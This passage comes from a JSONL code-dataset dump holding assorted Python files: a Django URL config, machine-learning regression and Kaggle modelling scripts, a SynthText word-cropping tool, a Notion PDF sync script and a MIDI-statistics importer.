unique_views = unique_users,\n updated = updated_time\n )\n metric.save()\n return\n","sub_path":"block_analytics/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"155664750","text":"from django.conf.urls import url\nfrom cms import views\nfrom cms.views import ContactDetailView\n\nurlpatterns = [\n # 連絡先\n # url(r'^contact/$', views.index, name='index'),\n url(r'^contact/$', views.contact_list, name='contact_list'), # 一覧\n url(r'^contact/add/$', views.contact_edit, name='contact_add'), # 登録\n url(r'^contact/mod/(?P\\d+)/$', views.contact_edit, name='contact_mod'), # 修正\n url(r'^contact/del/(?P\\d+)/$', views.contact_del, name='contact_del'), # 削除\n url(r'^contact/detail/(?P\\d+)/$', views.contact_detail, name='contact_detail'), # 削除\n\n # url(r'^(?P\\d+)$', MyDetailView.as_view()),\n # url(r'^(?P[-\\w]+)/$', ContactDetailView.as_view(), name='contact_detail'),\n # url(r'^detail/(?P[0-9]+)/$', views.ContactDetailView.as_view(), name='detail'),\n url(r'(?P\\d+)/$', views.detail, name='contact_detail'),\n]\n","sub_path":"mycontacts/cms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"390649382","text":"import tarfile\nimport unittest\nfrom urllib.request import urlretrieve\n\nfrom ait.common import move_some_files_for_validation\n\n\nclass TestBuildTF(unittest.TestCase):\n def test_build_tf_data_from_image(self):\n urlretrieve(\n 'http://download.tensorflow.org/example_images/flower_photos.tgz',\n '/tmp/flower_photos.tgz')\n tar = tarfile.open('/tmp/flower_photos.tgz')\n tar.extractall('/tmp')\n move_some_files_for_validation('/tmp/flower_photos')\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"aitlib/ait/cnn-unit-test/validation_data_set_create.py","file_name":"validation_data_set_create.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"497494485","text":"# author cj 
time:2017/12/27\r\n# 核岭回归(KRR)结合岭回归(线性最小二乘与l2范数正则化)与核技巧。\r\n# 因此它学习了由各个内核和数据引起的空间中的线性函数。\r\n# pollution 6个,pollution1 5个 ,polltion2 7个特征,1个结果\r\n\r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn import linear_model\r\nimport numpy as np\r\n\r\nfrom pollution.gradient import *\r\ndata=np.loadtxt(fname='pollution1.txt')\r\nmu=np.average(data[:,0:5],axis=0)\r\nsigma=np.std(data[:,0:5],axis=0)\r\ndata[:,0:5]=Z_ScoreNormalization(data[:,0:5],mu,sigma)\r\ntem=data.copy()\r\nX_data=tem[:,0:5]\r\nX_label=tem[:,5]\r\nprint(tem)\r\n\r\nskf=KFold(n_splits=4)#4折交叉验证\r\nfor train_index,test_index in skf.split(X_data,X_label):\r\n X_trainData, X_trainLabel = X_data[train_index], X_label[train_index]#训练集的数据,训练集的结果\r\n X_testData, X_testLabel = X_data[test_index], X_label[test_index]#测试集的数据,测试集的结果\r\n # X_testLabel=np.reshape(X_testLabel,newshape=(np.size(X_testLabel),1))\r\n\r\n\r\n reg = linear_model.LinearRegression()\r\n\r\n reg.fit(X_trainData,X_trainLabel)\r\n m_test = np.size(X_testLabel) # 测试集的数量\r\n theta1=reg.coef_\r\n theta2=reg.intercept_\r\n\r\n\r\n theta=np.hstack((theta2,theta1))\r\n X_testData = np.hstack((np.ones(shape=(m_test, 1)), X_testData))\r\n\r\n print('the average cost is:', averageCost(X_testData, X_testLabel, theta))\r\n predict = np.dot(X_testData, theta)\r\n print(predict[0:10], X_testLabel[0:10])\r\n plotData(predict[0:50], X_testLabel[0:50])\r\n\r\n\r\n\r\n","sub_path":"pollution/temt1.py","file_name":"temt1.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"519139073","text":"# -*- coding: UTF-8 -*-\r\n# Public pack\r\nimport os\r\n# Private pack\r\nimport headpy.hbes.hopp as hopp\r\nimport headpy.hbes.hfit as hfit\r\nimport headpy.hfile.hpickle as hpickle\r\n\r\n# 设定初始参数 #######################################\r\nproduct_list = {}\r\nproduct_list['gmean'] = [0, 0, -0.01, 0.01]\r\nproduct_list['gsigm'] = [0, 0.0001, 0, 0.005]\r\nproduct_list['npdf1'] = [0, 100, 0, 3000]\r\nproduct_list['npdf2'] = [0, 50, 0, 3000]\r\nproduct_list['p0'] = [-1, 1, -1000, 1000]\r\nproduct_list['p1'] = [-1, 1, -1000, 1000]\r\nproduct_list['p2'] = [-1, 1, -1000, 1000]\r\nproduct_list['p3'] = [-1, 1, -1000, 1000]\r\n# 设定拟合函数变量 ######################################\r\nenergy_list = hopp.energy_list()\r\ntree = 'fit4c'\r\nread = ['real', 'omeganpw']\r\ncuts = hopp.cut()\r\ncuts['momega']['inter'] = 50\r\ncuts['momega']['cut'] = 0.15\r\ncuts['momega']['range'] = 0.15\r\ndatar = 'real'\r\ndatam = 'omeganpw'\r\nbranch = 'momega'\r\ndocuts = ['chisq', 'mpi01', 'mpi02', 'mpi03', 'momega']\r\ndoweight = 'yes'\r\ntempfolder = '/scratchfs/bes/leizh/plot/opp/ftemp'\r\nprojectname = 'fitplot'\r\nscriptname = '6.python2_fit/script/1.normal.py'\r\nos.system('mkdir %s/%s' % (tempfolder, projectname))\r\noption_list = product_list\r\nbackfunction = 'd2polynomial'\r\nsignfunction = 'evolution'\r\n#######################################################\r\nfor energy in energy_list:\r\n result = hfit.dofit_sample(energy=energy,\r\n tree=tree,\r\n read=read,\r\n cuts=cuts,\r\n datar=datar,\r\n datam=datam,\r\n branch=branch,\r\n docuts=docuts,\r\n doweight=doweight,\r\n tempfolder=tempfolder,\r\n projectname=projectname,\r\n scriptname=scriptname,\r\n option_list=option_list,\r\n backfunction=backfunction,\r\n signfunction=signfunction)\r\n hpickle.pkl_dump('6.python2_fit/1.normal_pkl/%1.4f.pkl' % (energy), 
result)\r\n","sub_path":"opp/6.python2_fit/1.1.normal_try.py","file_name":"1.1.normal_try.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"187851794","text":"\n\n##################################################################\n\n# 해당 소스파일의 저작권은 없습니다.\n# 필요하신 분들은 언제나 사용하시길 바라며, 해당 소스코드의 부족한 부분에 대해서는\n# whcl303@hanmail.net으로 언제든지 피드백 주시길 바랍니다:)\n# 소스설명 : 데이터분석(EDA 등) 후, 데이터 모델링을 위한 Main 함수 구조입니다.\n\n##################################################################\n\n# 가변길이 argument를 받을 때 *args 사용 (*만 있으면 사용가능)\n\n########################### args 리스트 ###########################\n\n# Local환경 모델\n\n#0 : Data 경로, #1 : Log File 경로, #2 : Model 결과 저장 위치\n\n# (ex, #0 : Data 경로(train), #1 : Data 경로(test), #2 : Output #3 : 모델)\n\n##################################################################\n\ndef main(*args):\n\n import pandas as pd\n import logging\n import numpy as np\n\n ##################################################################\n\n # preparations : arguments 변수 정의 및 logging 설정\n # logging level : DEBUG, INFO, WARNING, ERROR, CRITICAL\n\n data_adrress = args[0]\n log_adrress = args[1]\n model_output_adrress = args[2]\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(\"log\")\n logger.setLevel(logging.INFO)\n file_handler = logging.FileHandler(log_adrress + \"/log.log\")\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n logging.basicConfig()\n\n logger.info(\"Program Start..\")\n\n ##################################################################\n\n # Frist : Read data from the directory -> rawData\n\n import read_data\n\n logger.info(\"read data start..\")\n\n rawData = read_data.read_csv(data_adrress)\n\n # 콘솔창 출력 column 확대\n pd.set_option('display.max_columns', None)\n # pd.set_option('display.max_rows', None)\n\n #print(rawData_test)\n\n logger.info(\"read data end..\")\n\n ##################################################################\n\n # Second : Preprocess data from rawData to Train & Test set\n # Step : 1.remove Outlier 2.Feature Scaling 3.Test/Train Split & Shuffle\n\n import preprocessing\n\n logger.info(\"preprocessing start..\")\n\n # Proprocess rawData according to data characteristics\n\n # step 1 : remove outlier & feature scaling (from EDA or domain Knowledge)\n\n # X (Independent variable) & Y (Dependent variable) Split\n\n preprocessing_Data_X, preprocessing_Data_Y, x_test = preprocessing.preprocessing(rawData)\n\n\n x_train = preprocessing_Data_X\n y_train = preprocessing_Data_Y\n\n # print(x_train.shape, y_train.shape)\n\n logger.info(\"preprocessing end..\")\n\n ##################################################################\n\n # Third : Build Model\n\n from sklearn.model_selection import KFold\n\n logger.info(\"build Model start..\")\n\n import knn\n import logistic_regression\n import randomforest\n import gradientboosting\n from sklearn.model_selection import KFold\n\n num_folds = 5\n num_instance = len(y_train)\n k_fold = KFold(n_splits = num_folds, shuffle=True)\n\n\n KFold(num_folds)\n x_train = x_train.values\n y_train = y_train.values.ravel()\n\n knn_model = knn.KNN_clf(10, x_train, y_train)\n logistic_model = logistic_regression.regression(x_train, y_train)\n randomforest_model = randomforest.randomforest(x_train, y_train, 20, 0)\n xgboost_model = gradientboosting.xgb(x_train, y_train, 0.01, 100)\n\n logger.info(\"build Model end..\")\n\n 
##################################################################\n\n # Fourth : Test & Tuning Model\n\n logger.info(\"test start..\")\n\n from sklearn import metrics\n from sklearn.model_selection import cross_val_score\n\n y_pred_knn_model = knn_model.predict(x_train)\n print('knn_model 정확도 :', metrics.accuracy_score(y_train, y_pred_knn_model))\n print('knn_model 정확도 (K-Fold) :', np.mean(cross_val_score(knn_model, x_train, y_pred_knn_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_logistic_model = logistic_model.predict(x_train)\n print('logistic_model 정확도 :', metrics.accuracy_score(y_train, y_pred_logistic_model))\n print('logistic_model 정확도 (K-Fold) :', np.mean(cross_val_score(logistic_model, x_train, y_pred_logistic_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_randomforest_model = randomforest_model.predict(x_train)\n print('randomforest_model 정확도 :', metrics.accuracy_score(y_train, y_pred_randomforest_model))\n print('randomforest_model 정확도 (K-Fold) :', np.mean(cross_val_score(randomforest_model, x_train, y_pred_randomforest_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_xgboost_model = xgboost_model.predict(x_train)\n print(' xgboost_model 정확도 :', metrics.accuracy_score(y_train, y_pred_xgboost_model))\n print(' xgboost_model 정확도 (K-Fold) :', np.mean(cross_val_score( xgboost_model, x_train, y_pred_xgboost_model, cv = k_fold, scoring= 'neg_log_loss')))\n\n y_pred_xgboost_model_final = xgboost_model.predict(x_test)\n\n logger.info(\"test end..\")\n\n ##################################################################\n\n # Fifth : clear memory & Save Output\n\n logger.info(\"save start..\")\n\n import joblib\n joblib.dump(xgboost_model, model_output_adrress+\"./xgboost_model.pkl\")\n\n logger.info(\"save end..\")\n logger.info(\"Program End..\")\n\n\nmain(\"C:/Users/whcl3/PycharmProjects/DataScience/Kaggle/kobe/Input/data.csv\", \"C:/Users/whcl3/PycharmProjects/DataScience/Kaggle/kobe/Output\", \"C:/Users/whcl3/PycharmProjects/DataScience/Kaggle/kobe/Model\")","sub_path":"Kaggle/kobe/create_model.py","file_name":"create_model.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"87996188","text":"import os\nimport json\n\n\ndef read_contents_from_file(file):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(dir_path, file)\n with open(file_path) as data_file:\n data = json.load(data_file)\n return data\n\n\ndef save_module_config(file, module_id, config_id, value):\n data = read_contents_from_file(file)\n for module in data['modules']:\n if module_id != module['id']:\n continue\n\n configurations = module['configurations']\n for configuration in configurations:\n if configuration['type'] is config_id:\n configuration['value'] = str(value)\n break\n break\n data = json.dumps(data, indent=2, separators=(',', ': '))\n write_contents_to_file(file, data)\n\n\ndef write_contents_to_file(file, data):\n dir_path = os.path.dirname(os.path.realpath(__file__))\n file_path = os.path.join(dir_path, file)\n with open(file_path, 'w') as data_file:\n data_file.write(data)\n","sub_path":"Sourcecode/MainController/file_writer.py","file_name":"file_writer.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"411323201","text":"from notion_api import NotionAPI\nfrom drive import FetchPdfNames\n\n\nDATE_FILE_PATH = './updated_date'\n\ndef 
main(is_debug):\n if not is_debug:\n import config\n api_key = config.API_SECRET\n database_id = config.DATABASE_ID\n driver_path = config.DRIVER_PATH\n elif is_debug:\n import config_debug\n api_key = config_debug.API_SECRET\n database_id = config_debug.DATABASE_ID\n driver_path = config_debug.DRIVER_PATH\n\n fetcher = FetchPdfNames(driver_path=driver_path)\n notion_user = NotionAPI(api_key=api_key, database_id=database_id)\n\n # main function\n if not is_debug:\n release_mode(fetcher, notion_user)\n else:\n # Do Something\n debug_mode()\n\ndef debug_mode():\n pass\n\ndef release_mode(fetcher, notion_user):\n last_updated_at = get_last_updated_date()\n pdf_infos = fetcher.get_new_pdf_infos_since(last_updated_at)\n for pdf_info in pdf_infos:\n print(pdf_info)\n notion_user.post_pdf(pdf_info)\n # 更新日をファイルに追記\n update_date_file()\n\n# 最終更新日だけ返す\ndef get_last_updated_date():\n with open(DATE_FILE_PATH) as f:\n # 全行読む\n lines = f.readlines()\n\n # 後ろから1行だけ返す\n return lines[-1]\n\ndef update_date_file():\n with open(DATE_FILE_PATH, mode='a') as f:\n f.write(f'\\n{get_today()}')\n\n# 2021/08/05 の形で ~今日の~ 日付を取得する\ndef get_today():\n import datetime\n\n dt_now = datetime.datetime.now()\n return dt_now.strftime('%Y/%m/%d')\n\n\nif __name__ == \"__main__\":\n is_debug = False # 本番用のデータ使うかどうか\n main(is_debug)\n # print(get_last_updated_date())\n # update_date_file()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"327794433","text":"from numpy import *\nfrom matplotlib.pyplot import *\n\ndef displayData(X, example_width=None):\n#DISPLAYDATA Display 2D data in a nice grid\n# display_array = DISPLAYDATA(X, example_width) displays 2D data\n# stored in X in a nice grid in the current figure. 
It returns\n# the displayed array.\n\n # Set example_width automatically if not passed in\n if example_width is None:\n example_width = round(sqrt(size(X, 1)))\n\n # Compute rows, cols\n m, n = shape(X)\n example_height = n / example_width\n\n # Compute number of items to display\n display_rows = int(sqrt(m))\n display_cols = (m + display_rows - 1) // display_rows\n\n # Between images padding\n pad = 1\n\n # Setup blank display\n display_array = - ones((pad + display_rows * (example_height + pad),\n pad + display_cols * (example_width + pad)))\n\n # Copy each example into a patch on the display array\n curr_ex = 0\n for j in range(display_rows):\n for i in range(display_cols):\n if curr_ex >= m:\n break\n # Copy the patch\n\n # Get the max value of the patch\n max_val = max(abs(X[curr_ex, :]))\n pos_x = pad + i * (example_width + pad)\n pos_y = pad + j * (example_height + pad)\n display_array[pos_y : pos_y + example_height, pos_x : pos_x + example_width] = \\\n reshape(X[curr_ex, :], (example_height, example_width), order='F') / max_val\n curr_ex += 1\n if curr_ex >= m:\n break\n\n # Display Image\n imshow(display_array, cmap=cm.gray)\n\n # Do not show axis\n axis('off')\n\n return display_array\n","sub_path":"machine-learning-ex3/ex3/displayData.py","file_name":"displayData.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"550502220","text":"import os\nimport numpy as np\nimport math\nimport h5py \nimport itertools\nfrom PIL import Image, ImageOps\nimport re\nimport cv2\nfrom sklearn.linear_model import LinearRegression\n\nfrom common import *\n\ndef main(db_fname):\n db = h5py.File(db_fname, 'r')\n dsets = sorted(db['data'].keys())\n print(\"total number of images : \", colorize(Color.RED, len(dsets), highlight=True))\n\n my_ch_label = open('results/my_label/1.csv', 'a')\n \n for k in dsets:\n rgb = db['data'][k][...]\n charBB = db['data'][k].attrs['charBB']\n wordBB = db['data'][k].attrs['wordBB']\n txt = db['data'][k].attrs['txt']\n\n print(\"image name : \", colorize(Color.RED, k, bold=True))\n print(\" ** no. of chars : \", colorize(Color.YELLOW, charBB.shape[-1]))\n print(\" ** no. 
of words : \", colorize(Color.YELLOW, wordBB.shape[-1]))\n print(\" ** text : \", colorize(Color.GREEN, txt))\n\n \"\"\"img = Image.fromarray(rgb, 'RGB')\n gray_image = ImageOps.grayscale(img)\n #img.save('results/my_label/images/'+k[:-2])\n gray_image.save('results/my_label/images/'+k[:-2])\"\"\"\n\n name_jpg = k\n chars_quantity = charBB.shape[-1]\n\n pixel_step_x = 1\n All_x_down_right_word, All_y_down_left_word, All_w_char_list, All_h_char_list, All_char_list = [], [], [], [], []\n \n all_symbols = ''\n new_txt = []\n ochered = -1\n \n for j in range(len(txt)):\n all_symbols = all_symbols + txt[j]\n all_symbols = re.sub('[(\\n) ]', '', all_symbols)\n txt_for_split = re.sub('(\\n)', ' ', txt[j])\n splitted = txt_for_split.split()\n new_txt = new_txt + splitted\n print('new_txt = ', new_txt)\n #print('charBB = ', charBB)\n for j in range(len(new_txt)): #кол-во слов\n ochered = ochered + 1\n print('номер = ', j, ' Слово = ', new_txt[j], ', кол-во букв = ', len(str(new_txt[j])),)\n i = 0\n num_ch_per_w = len(str(new_txt[j])) #кол-во букв для данного слова\n x_down_left_word = []\n y_down_left_word = []\n x_down_right_word = []\n y_down_right_word = []\n word = ''\n w_of_next_ch_word = []\n h_of_next_ch_word = []\n\n x_top_left_word, x_top_right_word, y_top_left_word, y_top_right_word = [], [], [], []\n while i < num_ch_per_w:\n i = i + 1\n\n print('Буква = ', all_symbols[ochered])\n\n x_down_left = charBB[0][3][ochered]\n y_down_left = charBB[1][3][ochered]\n x_top_left = charBB[0][0][ochered]\n y_top_left = charBB[1][0][ochered]\n x_top_right = charBB[0][1][ochered]\n y_top_right = charBB[1][1][ochered]\n x_down_right = charBB[0][2][ochered]\n y_down_right = charBB[1][2][ochered] \n\n value_of_symbol = all_symbols[ochered]\n word = word + value_of_symbol\n\n w_of_next_ch = ((x_down_right - x_down_left)**2+(y_down_right - y_down_left)**2)**0.5\n h_of_next_ch = ((x_top_right - x_down_right)**2+(y_top_right - y_down_right)**2)**0.5\n\n w_of_next_ch_word.append(int(w_of_next_ch))\n h_of_next_ch_word.append(int(h_of_next_ch))\n\n x_down_left_word.append(int(x_down_left))\n y_down_left_word.append(int(y_down_left))\n x_down_right_word.append(int(x_down_right))\n y_down_right_word.append(int(y_down_right))\n\n x_top_left_word.append(int(x_top_left))\n y_top_left_word.append(int(y_top_left))\n x_top_right_word.append(int(x_top_right))\n y_top_right_word.append(int(y_top_right))\n\n if i <= num_ch_per_w - 1:\n ochered = ochered + 1\n \n tg_alpha, b, model = lin_reg(x_down_left_word, y_down_left_word, x_down_right_word, y_down_right_word)\n \n x_down_right_word, y_down_left_word = dot_word_crop(tg_alpha, b, k, rgb, word, w_of_next_ch_word, h_of_next_ch_word, \n x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_top_left_word, y_top_right_word)\n\n db.close()\n \ndef dot_word_crop(tg_alpha, b, k, rgb, word, w_of_next_ch_word, h_of_next_ch_word, \n x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_top_left_word, y_top_right_word):\n\n y_down_right_word, y_down_left_word = [], []\n for i in x_down_left_word:\n next_y = tg_alpha * i + b\n y_down_left_word.append(next_y)\n\n for i in x_down_right_word:\n next_y = tg_alpha * i + b\n y_down_right_word.append(next_y)\n\n x_top_left, x_top_right, y_top_left, y_top_right = int(x_top_left_word[0]), int(x_top_right_word[-1]) + 3, int(y_top_left_word[0]), int(y_top_right_word[-1])\n x_down_left, x_down_right, y_down_left, y_down_right = int(x_down_left_word[0]), int(x_down_right_word[-1]) + 3, 
int(y_down_left_word[0]), int(y_down_right_word[-1])\n \n img = rgb\n #img = cv2.circle(img, (x_top_left, y_top_left), radius=0, color=(0, 0, 255), thickness=2)\n #img = cv2.circle(img, (x_top_right, y_top_right), radius=0, color=(0, 0, 255), thickness=2)\n #img = cv2.circle(img, (x_down_right, y_down_right), radius=0, color=(0, 0, 255), thickness=2)\n #img = cv2.circle(img, (x_down_left, y_down_left), radius=0, color=(0, 0, 255), thickness=2)\n\n h_of_word = min(h_of_next_ch_word)\n w_of_word = int(((x_down_right - x_down_left)**2+(y_down_right - y_down_left)**2)**0.5)\n\n #y_top_left, y_top_right, y_down_left, y_down_right, x_top_left, x_top_right, x_down_left, x_down_right = transform_coord(tg_alpha, word, \n # y_top_left, y_top_right, y_down_left, y_down_right, \n # x_top_left, x_top_right, x_down_left, x_down_right)\n\n h_of_word_new = h_of_word + 22\n\n pts1 = np.float32([[x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left]])\n pts2 = np.float32([[0,0],[w_of_word,0],[w_of_word,h_of_word_new],[0,h_of_word_new]])\n #pts2 = np.float32([[0,0],[w_of_word,0],[w_of_word,h_of_word],[0,h_of_word]])\n\n M = cv2.getPerspectiveTransform(pts1,pts2)\n dst = cv2.warpPerspective(img,M,(w_of_word, h_of_word_new))\n\n w_of_word_new = w_of_word * 2\n #h_of_word_new = 32\n \n #img = cv2.circle(img, (x_top_left, y_top_left), radius=0, color=(0, 255, 0), thickness=2)\n #img = cv2.circle(img, (x_top_right, y_top_right), radius=0, color=(0, 255, 0), thickness=2)\n #img = cv2.circle(img, (x_down_right, y_down_right), radius=0, color=(0, 255, 0), thickness=2)\n #img = cv2.circle(img, (x_down_left, y_down_left), radius=0, color=(0, 255, 0), thickness=2)\n cv2.imwrite(\"results/dots/{}_my.png\".format(k[:-2]),img)\n cv2.imwrite('results/my_words/{}__{}'.format(word, k[:-2]), dst)\n\n img_word = cv2.imread('results/my_words/{}__{}'.format(word, k[:-2]), 3)\n\n cv2.imwrite('results/my_words/{}__{}'.format(word, k[:-2]), img_word)\n\n coordinates, coordinates_old = apply_center_coord_transform(x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_down_right_word, y_down_left_word, y_top_left_word, y_top_right_word, \n w_of_next_ch_word, h_of_next_ch_word, M)\n img_word = cv2.hconcat((img_word, np.zeros((np.shape(img_word)[0], 32, 3), dtype=np.uint8) ))\n img_word = cv2.hconcat((np.zeros((np.shape(img_word)[0], 32, 3), dtype=np.uint8), img_word ))\n for i in coordinates:\n # Horizontal border\n \n img_word = cv2.circle(img_word, (i[0] + 32, i[1]), radius=0, color=(0, 0, 255), thickness=2)\n \n cv2.imwrite('results/my_words/{}__{}'.format(word, k[:-2]), img_word)\n\n for i in coordinates_old:\n # Horizontal border\n \n img = cv2.circle(img, (i[0], i[1]), radius=0, color=(0, 0, 255), thickness=2)\n \n cv2.imwrite(\"results/dots/{}_my.png\".format(k[:-2]),img)\n\n #dst_new = cv2.resize(dst, (w_of_word_new, h_of_word_new))\n \n return x_down_right_word, y_down_left_word\n\ndef apply_center_coord_transform(x_down_left_word, x_down_right_word, x_top_left_word, x_top_right_word, \n y_down_right_word, y_down_left_word, y_top_left_word, y_top_right_word, \n w_of_next_ch_word, h_of_next_ch_word, M):\n \n \n \"\"\"print('before:', x_top_left, y_top_left)\n x_top_left, y_top_left = perspective_transform_coordinates(coordinates, M)\n print('after:', x_top_left, y_top_left)\n\n coordinates = [x_top_right, y_top_right]\n print('before:', x_top_right, y_top_right)\n x_top_right, y_top_right = perspective_transform_coordinates(coordinates, M)\n 
print('after:', x_top_right, y_top_right)\n\n coordinates = [x_down_left, y_down_left]\n print('before:', x_down_left, y_down_left)\n x_down_left, y_down_left = perspective_transform_coordinates(coordinates, M)\n print('after:', x_down_left, y_down_left)\n\n coordinates = [x_down_right, y_down_right]\n print('before:', x_down_right, y_down_right)\n x_down_right, y_down_right = perspective_transform_coordinates(coordinates, M)\n print('after:', x_down_right, y_down_right)\"\"\"\n coordinates = []\n coordinates_old = []\n for i in range(len(x_down_left_word)):\n\n middle_x = (x_down_left_word[i] + x_down_right_word[i] + x_top_left_word[i] + x_top_right_word[i])/4\n middle_y = (y_down_left_word[i] + y_down_right_word[i] + y_top_left_word[i] + y_top_right_word[i])/4\n coordinates_old.append((int(middle_x), int(middle_y)))\n middle_x, middle_y = perspective_transform_coordinates([middle_x, middle_y], M)\n coordinates.append((int(middle_x), int(middle_y)))\n return coordinates, coordinates_old\n\ndef transform_coord(tg_alpha, word, y_top_left, y_top_right, y_down_left, y_down_right, x_top_left, x_top_right, x_down_left, x_down_right): \n\n print('Before')\n print(word)\n print('[x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left] = ', \n [x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left])\n \n delta_b = 11\n\n if tg_alpha != 0:\n print('tg_alpha != 0:',word, tg_alpha)\n if tg_alpha < 0:\n tg_alpha = abs(tg_alpha)\n alpha = math.atan(tg_alpha)\n\n y_down_left, y_down_right = int(y_down_left + delta_b * math.cos(alpha)), int(y_down_right + delta_b * math.cos(alpha))\n x_down_left = int(x_down_left + delta_b * math.sin(alpha))\n x_down_right = int(x_down_right + delta_b * math.sin(alpha))\n\n y_top_left, y_top_right = int(y_top_left - delta_b * math.cos(alpha)), int(y_top_right - delta_b * math.cos(alpha))\n x_top_left = int(x_top_left - delta_b * math.sin(alpha))\n x_top_right = int(x_top_right - delta_b * math.sin(alpha))\n\n elif tg_alpha > 0:\n tg_alpha = abs(tg_alpha)\n alpha = math.atan(tg_alpha)\n\n y_down_left, y_down_right = int(y_down_left + delta_b * math.cos(alpha)), int(y_down_right + delta_b * math.cos(alpha))\n x_down_left = int(x_down_left - delta_b * math.sin(alpha))\n x_down_right = int(x_down_right - delta_b * math.sin(alpha))\n\n y_top_left, y_top_right = int(y_top_left - delta_b * math.cos(alpha)), int(y_top_right - delta_b * math.cos(alpha))\n x_top_left = int(x_top_left + delta_b * math.sin(alpha))\n x_top_right = int(x_top_right + delta_b * math.sin(alpha))\n else:\n y_top_left, y_top_right, y_down_left, y_down_right = y_top_left - delta_b, y_top_right - delta_b, y_down_left + delta_b, y_down_right + delta_b\n print('After')\n print(word)\n print('[x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left] = ', \n [x_top_left, y_top_left], [x_top_right, y_top_right], [x_down_right, y_down_right], [x_down_left, y_down_left])\n\n return y_top_left, y_top_right, y_down_left, y_down_right, x_top_left, x_top_right, x_down_left, x_down_right\n\n\ndef lin_reg(x_down_left_word, y_down_left_word, x_down_right_word, y_down_right_word):\n x = np.array(x_down_left_word + x_down_right_word).reshape((-1, 1))\n y = np.array(y_down_left_word + y_down_right_word)\n\n model = LinearRegression().fit(x, y)\n print('intercept:', model.intercept_)\n print('slope:', model.coef_)\n k = model.coef_[0]\n b = model.intercept_\n return 
k, b, model\n\ndef perspective_transform_coordinates(coordinates, m_matrix):\n \"\"\"\n Function Description: Apply perspective transformation to coordinates.\n Parameters:\n Return Value:\n Exception Description:\n Change History:\n 2020-07-30 12:00 function created.\n \"\"\"\n \"\"\"center = (0, 0)\n newrow = [0, 0, 1]\n r_matrix = cv2.getRotationMatrix2D(center, 0.0, 1.0)\n r_matrix = np.vstack([r_matrix, newrow])\n m_matrix = np.dot(M, r_matrix)\"\"\"\n\n # Perform the actual coordinates processing\n coordinates.append(1)\n new_coordinates = np.dot(m_matrix, coordinates)\n new_coordinates[0] = round(new_coordinates[0] / new_coordinates[2], 1)\n new_coordinates[1] = round(new_coordinates[1] / new_coordinates[2], 1)\n return new_coordinates[:2]\n\nif __name__=='__main__':\n main('/home/sondors/SynthText_ubuntu/results/1.h5')","sub_path":"recognizer_dataset.py","file_name":"recognizer_dataset.py","file_ext":"py","file_size_in_byte":14056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"625396047","text":"import joblib\nimport glob\nimport os\nimport pretty_midi\n\n# PANDAS\nimport pandas as pd\n\nclass ImportMIDI(): \n def __init__(self, num_files=1000): \n\n all_files = glob.glob(os.path.join('..', 'lmd_aligned', '*', '*', '*', '*', '*.mid'))\n files_to_use = all_files[0:num_files]\n statistics = joblib.Parallel(n_jobs=100, verbose=50)(\n joblib.delayed(self.compute_statistics)(midi_file)\n for midi_file in files_to_use)\n # When an error occurred, None will be returned; filter those out.\n statistics = [s for s in statistics if s is not None]\n\n df = pd.DataFrame(statistics)\n\n self.imported_MIDI_data = df[df[\"program_numbers\"].apply(self.has_all_instruments)].reset_index(drop=True)\n \n \n def get_midi_data(self): \n return self.imported_MIDI_data \n \n def compute_statistics(self, midi_file):\n \"\"\"\n Given a path to a MIDI file, compute a dictionary of statistics about it\n\n Parameters\n ----------\n midi_file : str\n Path to a MIDI file.\n\n Returns\n -------\n statistics : dict\n Dictionary reporting the values for different events in the file.\n \"\"\"\n # Some MIDI files will raise Exceptions on loading, if they are invalid.\n # We just skip those.\n try:\n pm = pretty_midi.PrettyMIDI(midi_file)\n # Extract informative events from the MIDI file\n return {'n_instruments': len(pm.instruments),\n 'program_numbers': [i.program for i in pm.instruments if not i.is_drum],\n 'key_numbers': [k.key_number for k in pm.key_signature_changes],\n 'tempos': list(pm.get_tempo_changes()[1]),\n 'time_signature_changes': pm.time_signature_changes,\n 'end_time': pm.get_end_time(),\n 'lyrics': [l.text for l in pm.lyrics],\n 'path': midi_file,\n 'midi': pm}\n # Silently ignore exceptions for a clean presentation (sorry Python!)\n except Exception as e:\n pass\n \n def 